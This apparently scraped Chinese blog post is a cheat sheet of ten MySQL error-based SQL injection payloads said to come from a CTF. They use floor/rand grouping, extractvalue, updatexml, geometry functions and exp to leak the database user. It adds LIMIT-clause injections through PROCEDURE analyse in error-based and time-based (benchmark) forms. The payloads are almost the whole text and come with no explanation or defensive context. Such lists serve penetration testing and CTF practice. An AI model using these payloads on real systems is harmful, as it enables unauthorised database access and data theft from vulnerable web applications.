zoukankan      html  css  js  c++  java
  • 十种Mysql报错注入

    某CTF收集的Mysql爆表、爆字段语句 - Coolbreeze - Coolbreezes Blog

    一、

    and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)

    二、

    and (extractvalue(1,concat(0x5c,(select user()))));

    三、

    and (updatexml(1,concat(0x5e25,(select user()),0x5e25),1));

    四、

    and GeometryCollection((select * from(select * from(select user())a)b));

    五、

    and multipoint((select * from(select * from(select user())a)b));

    六、

    and polygon((select * from(select * from(select user())a)b));

    七、

    and multipolygon((select * from(select * from(select user())a)b));

    八、

    and linestring((select * from(select * from(select user())a)b));

    九、

    and multilinestring((select * from(select * from(select user())a)b));

    十、

    and exp(~(select * from(select user())a));

    limit 注入

      报错注入

      1,1 PROCEDURE  analyse(extractvalue(rand(),concat(0x3a,version())),1) -- a

       时间

      1 procedure analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(10000000,sha1(1)),1)))),1);

  • 相关阅读:
    this和$(this)的关系
    单色边表格
    php概率算法
    jQuery Ajax 参数解析
    拍拍CPS入门使用
    飞鸽端口被占
    浏览器调试工具技巧分享
    事件click,bind,click
    jQuery旋转插件—rotate
    利用谷歌API生成二维码
  • 原文地址:https://www.cnblogs.com/ashe666/p/8267997.html
Copyright © 2011-2022 走看看